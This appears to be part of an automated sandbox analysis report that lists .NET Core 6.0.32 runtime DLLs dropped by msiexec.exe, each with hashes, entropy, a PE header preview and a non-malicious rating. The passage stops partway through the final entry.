                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.368970650031484
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ODWvhWJWYnO/VWQ4mWbAcH2vArqnajKsbTY3:ODWvhWJUrcH24rlGsbTY3
                                                                                                                                                                                                                                        MD5:215E3FA11BE60FEAAE8BD5883C8582F3
                                                                                                                                                                                                                                        SHA1:F5BF8B29FA5C7C177DFEC0DE68927077E160C9AB
                                                                                                                                                                                                                                        SHA-256:FBB9032835D0D564F2F53BBC4192F8A732131B8A89F52F5EF3FF0DAA2F71465F
                                                                                                                                                                                                                                        SHA-512:C555698F9641AF74B4C5BB4CA6385B8D69D5A3D5D48504E42B0C0EB8F65990C96093687BC7EE818AA9C24432247AFAD7DF3BF086010A2EFCD3A1010B2FCD6A31
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......d.........." .........0...............................................@......5.....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.601897142725442
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:pTvuBL3BBLxWvhWcWYnO/VWQ4mW74j21EhqnajKsxX+:pTvuBL3BXWvhWKUBqslGsxu
                                                                                                                                                                                                                                        MD5:9A8AB7FE8C4CC7604DFF1FBFA57458AA
                                                                                                                                                                                                                                        SHA1:68ED7B6B5191F53B50D6A1A13513DB780AB19211
                                                                                                                                                                                                                                        SHA-256:E9A3D7F8A08AB5BC94ACB1EC1BFFDA90469FEC3B7EECDF7CF5408F3E3682D527
                                                                                                                                                                                                                                        SHA-512:05DAEABBCDE867E63FDE952213FFF42AF05E70AE72643C97060A90DCEA2A88B75947B6F503CB2C33938AFE36AD1BAFBA5008C1BBE839F6498CDA27DA549DAEE9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...P.1..........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):5.116096564588074
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6naOMw3zdp3bwjGzue9/0jCRrndbDWvhWfUCBoliM:POMwBprwjGzue9/0jCRrndbwIJY
                                                                                                                                                                                                                                        MD5:DE5695F26A0BCB54F59A8BC3F9A4ECEF
                                                                                                                                                                                                                                        SHA1:99C32595F3EDC2C58BDB138C3384194831E901D6
                                                                                                                                                                                                                                        SHA-256:E9539FCE90AD8BE582B25AB2D5645772C2A5FB195E602ECDBF12B980656E436A
                                                                                                                                                                                                                                        SHA-512:DF635D5D51CDEA24885AE9F0406F317DDCF04ECB6BFA26579BB2E256C457057607844DED4B52FF1F5CA25ABE29D1EB2B20F1709CF19035D3829F36BBE31F550F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....3..........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.483681194749599
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:WqfWvhWoWYnO/VWQ4mWKNe4XEKup3JdqnajKsztPO/B:WGWvhWWU9X7aJdlGsztP2
                                                                                                                                                                                                                                        MD5:7DDDA921E16582B138A9E7DE445782A0
                                                                                                                                                                                                                                        SHA1:9B2D0080EDA4BA86A69B2C797D2AFC26B500B2D3
                                                                                                                                                                                                                                        SHA-256:EF77B3E4FDFF944F92908B6FEB9256A902588F0CF1C19EB9BF063BB6542ABFFF
                                                                                                                                                                                                                                        SHA-512:C2F4A5505F8D35FBDD7B2ECA641B9ECFCB31FE410B64FDE990D57B1F8FD932DFF3754D9E38F87DB51A75E49536B4B6263D8390C7F0A5E95556592F2726B2E418
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...dIx..........." .........0...............................................@.......:....`A........................................p...l............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.417647805455514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RWvhW0WYnO/VWQ4SWKeE+Ztc80Hy5qnajsBkUqS:RWvhWiUxslE5qS
                                                                                                                                                                                                                                        MD5:BF622378D051DB49BDC62ACA9DDF6451
                                                                                                                                                                                                                                        SHA1:EFD8445656A0688E5A8F20243C2419984BB7743E
                                                                                                                                                                                                                                        SHA-256:0BFEDB0D28E41E70BF9E4DA11E83F3A94C2191B5CD5DD45D9E9D439673B830CE
                                                                                                                                                                                                                                        SHA-512:DF32D34C81FDE6EEF83A613CE4F153A7945EECFB1EC936AC6ED674654A4E167EC5E5436185B8064177F5F9273D387CA226C3C9529591180250A9C5C581EC6F70
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....2............" .........0...............................................@.......p....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.6126507489483375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:qF3qWvhWQWYnO/VWQ4SWL7JJsxZAqnajT9CgsLam:qF6WvhW+UA7s/Al39wR
                                                                                                                                                                                                                                        MD5:A56E3E2AA6398CCB355C7CDE81CCB6E5
                                                                                                                                                                                                                                        SHA1:A26273DD41DB7B63D3A79ACF6F4F3CF0381A8F02
                                                                                                                                                                                                                                        SHA-256:25AF1BC31C4A3FB9F1036C9AA51CB0AE8899C499B3EEF4CF7281515C1EA27B47
                                                                                                                                                                                                                                        SHA-512:3D5CEC9E5B42724794282974F637B1FDA8C26ADF01ED19DD2EC4F940E01CD43BDC42E46DC3E62704E62553DE96D3FEA1616C9650AF73CDB557DFCA1B52051A64
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.978924663768967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Hck1JzNcKSIGqAWvhWTUpDX7aJdlGsztMs:3cKSswKz7aJGps
                                                                                                                                                                                                                                        MD5:82159E8D92E38C4F287EB9420DCF1F9F
                                                                                                                                                                                                                                        SHA1:2E4436DBE18D943416A388777D05BFE5CB553DE7
                                                                                                                                                                                                                                        SHA-256:0D22CE9D987EFD6886A8DE66A6A678C287D29B15963B4373F73D79DDE42C9827
                                                                                                                                                                                                                                        SHA-512:DCEF1E0C7916C8CD08148962949A996FFC5D46B899CD82DFBCD9BB1BC614622BC8997F1E7D3C4E3D75F2DF07540A4C17F39477CFE97BA7F0BD280CDD52E06F91
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......Y.........." .........0...............................................@.......K....`A........................................p................0...............0...!..............p............................................................................rdata..4...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.513848472591714
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:pwQpUwzDfIeOWvhW9WYnO/VWQ4+WWXtplsxZAqnajT9CGl:pZDfIeOWvhWNUFbls/Al39Hl
                                                                                                                                                                                                                                        MD5:74C264CFFC09D183FCB1555B16EA7E4B
                                                                                                                                                                                                                                        SHA1:0B5B08CDF6E749B48254AC811CA09BA95473D47C
                                                                                                                                                                                                                                        SHA-256:A8E2FC077D9A7D2FAA85E1E6833047C90B22C6086487B98FC0E6A86B7BF8BF09
                                                                                                                                                                                                                                        SHA-512:285AFBCC39717510CED2ED096D9F77FC438268ECAA59CFF3CF167FCC538E90C73C67652046B0EE379E0507D6E346AF79D43C51A571C6DD66034F9385A73D00D1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...%p_W.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..,...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.293598211920456
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:dWvhW/WYnO/VWQ4SWYujPUsxZAqnajT9Cl36:dWvhWvUgMs/Al39Eq
                                                                                                                                                                                                                                        MD5:D6F37B232E3F2E944EBCF53A662E852F
                                                                                                                                                                                                                                        SHA1:C10839E941444ED79C2314F90DA34E5742F4E514
                                                                                                                                                                                                                                        SHA-256:5E6AD9502C8411F29BC072EFD08C4FCD09BC3367814269DEDA74A78536FB8375
                                                                                                                                                                                                                                        SHA-512:6E0CF1021EF3FF31895D2B6A9E72084EBE52DE4201D317B12FB8B05A7B1946FDEF65D2B046F8FB25189D3A94F70726121F2E8EAC8239C00EE02EF5EAF57F21C5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata.. ...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.469567491280211
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:aGeVTg6WvhWGWYnO/VWQ4SWupBd80Hy5qnajsBkt2NjY:aGeVTg6WvhWsUldslE8+Y
                                                                                                                                                                                                                                        MD5:6397D5CC116D884D31552F613F748556
                                                                                                                                                                                                                                        SHA1:B76B19FE4D3D5D26D2DEE1983D384E26D961180E
                                                                                                                                                                                                                                        SHA-256:40EB38D84DFD13C8A58211B8273C4B4965148742F08EB6FE8B0830392C37ABC1
                                                                                                                                                                                                                                        SHA-512:4449DA9BAA3F722EB274AC527125F5918A17BC94B243849A0A44F3463E35F368339A58A6AA1E08B83D54D13538C0D52BFCB452A48B8B9A52961BF136256D220E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....C}.........." .........0...............................................@.......T....`A........................................p...<............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.375396134710155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:v0yyMvJWvhW4WYnO/VWQ4SWQwwV80Hy5qnajsBkrfFIf:zyMvJWvhWmUAIslEAfFI
                                                                                                                                                                                                                                        MD5:D2D7458AB838E738B54FB4D6FA490BF6
                                                                                                                                                                                                                                        SHA1:0CFC5659B23A35C987B96CABBC0D10325316385D
                                                                                                                                                                                                                                        SHA-256:285A481D7BA9859CC28BEDEDD8F05A90BD648A34D66B8C797118920B40E15E4E
                                                                                                                                                                                                                                        SHA-512:62E0ABB2E59D360D6A066E73289AA1B880E7C1A0B7E6C695F40B1E0F2CB11DEB9E54DEBA4045D2454B911AF109EC198F11073874A8F023EB1B71A16A74354A1E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....%fN.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..<...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.889960536352825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lQMwidv3V0dfpkXc0vVaLnWvhWTULrX7aJdlGsztzO1:xHdv3VqpkXc0vVagQ2L7aJGqO1
                                                                                                                                                                                                                                        MD5:255B18FE8AB465C87FB8AD20D9A63AAC
                                                                                                                                                                                                                                        SHA1:645823B0332ADDABA5E4EF40D421B2DA432FDA5E
                                                                                                                                                                                                                                        SHA-256:E050E1BFBB75A278412380C912266225C3DEE15031468DAE2F6B77FF0617AA91
                                                                                                                                                                                                                                        SHA-512:19244B084AC811B89E0E6A77F9308D20CF4FBB77621D34EEDC19FCD5C8775A33B2D9ADA3F408CBE5806C39745B30C1C1CC25D724DB9377B437D771AE0BF440B1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....>F..........." .........0...............................................@......Re....`A........................................p...X............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.557349562243787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ctZ3ZtIWvhW9NWYnO/VWQ4SWndusxZAqnajT9CMCz4:ctZ3wWvhW9dUds/Al39pCz4
                                                                                                                                                                                                                                        MD5:0A2432A420640A79FAAFF044AB054EF6
                                                                                                                                                                                                                                        SHA1:15688BF3C9330309EC5EA602C0AD5AF1FD68BC30
                                                                                                                                                                                                                                        SHA-256:9DFD114E4182662A669A3B9054DD2A24D96DD66ED96A8B2AC05601928B2084D5
                                                                                                                                                                                                                                        SHA-512:090D6D5046AEFE9006B319FC3F9740426BC93E50CF262CE65857449891CA69D2A235421CFEA3FB178D3F8B1E3F640B8678AA9D8F6E67B8A17985913BEBFB3FDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.617444368323971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:UgdKIMFemVWvhWNWYnO/VWQ4mWY1tcQIj21EhqnajKsxN:JH0WvhWdUDIqslGsxN
                                                                                                                                                                                                                                        MD5:E1A7B1F8CDB24324D0E44B0078DB8BD1
                                                                                                                                                                                                                                        SHA1:B6C2FE32AE5FA1398F7AE6245C405378E32A7897
                                                                                                                                                                                                                                        SHA-256:45D4F1E398E4CC73FD1AAAD80219D2A9D3205A228167C819EB6787D7B01FC186
                                                                                                                                                                                                                                        SHA-512:144AFE1CB812DE93FBDD08658AFEB4C95480A8E504C5DCF909FF226400CA2D0F48395CF71954FBD1B3DD93A49CBA39EC0DB3FC34A05804C93FD9A48B0A1749CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......d.........." .........0...............................................@.......A....`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.549935038939539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:+cWvhWoWYnO/VWQ4mWRhXEKup3JdqnajKsztzy:+cWvhWWUqX7aJdlGsztzy
                                                                                                                                                                                                                                        MD5:CB39EEA2EF9ED3674C597D5F0667B5B4
                                                                                                                                                                                                                                        SHA1:C133DC6416B3346FA5B0F449D7CC6F7DBF580432
                                                                                                                                                                                                                                        SHA-256:1627B921934053F1F7D2A19948AEE06FAC5DB8EE8D4182E6F071718D0681F235
                                                                                                                                                                                                                                        SHA-512:2C65014DC045A2C1E5F52F3FEA4967D2169E4A78D41FE56617CE9A4D5B30EBF25043112917FF3D7D152744DDEF70475937AE0A7F96785F97DCEFAFE8E6F14D9C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.319450964936577
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:MPWvhWRWYnO/VWQ4SWiIsxZAqnajT9CDH:yWvhWRUCs/Al39OH
                                                                                                                                                                                                                                        MD5:5B6C46F42ED6800C54EEB9D12156CE1F
                                                                                                                                                                                                                                        SHA1:66CE7A59B82702875D3E7F5B7CF8054D75FF495F
                                                                                                                                                                                                                                        SHA-256:2631CADCE7F97B9A9E6DF4E88F00F5A43EF73B070EE024ED71F0B447A387FF2F
                                                                                                                                                                                                                                        SHA-512:38FF6745BB5597A871B67AA53FCC8426BC2CDD16B6497A0EB7B59C21D8716F1ABB1F7C7A40A121AD1BD67B5490FEF5CF82EE8FD0BF848F27DCA27FC5D25DEC61
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......#.........." .........0...............................................@...........`A........................................p...<............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.6478341719136145
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:y0WvhW3WYnO/VWQ4mW8iTH2vArqnajKsbTYk:FWvhWnUIH24rlGsbTYk
                                                                                                                                                                                                                                        MD5:A68D15CAB300774D2A20A986EE57F9F4
                                                                                                                                                                                                                                        SHA1:BB69665B3C8714D935EE63791181491B819795CB
                                                                                                                                                                                                                                        SHA-256:966DDBF59E1D6C2A80B8ABBF4A30D37475DE097BF13FB72BA78684D65975CD97
                                                                                                                                                                                                                                        SHA-512:AC040F92560631CA5162C7559173BDFE858E282225967AB1ADC0A038D34943B00DB140D44319CD2CDC2864295A098AB0BA634DFAA443E1D1782FA143AE4C217D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...8.?;.........." .........0...............................................@......5.....`A........................................P................0...............0...!..............p............................................................................rdata..@...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25056
                                                                                                                                                                                                                                        Entropy (8bit):4.647238720605179
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3jQ/w8u4cy1WvhWb9WYnO/VWQ4SWANsAlosytkqnaj6Md:fy1WvhWhUNsilWMd
                                                                                                                                                                                                                                        MD5:0E35E369165875D3A593D68324E2B162
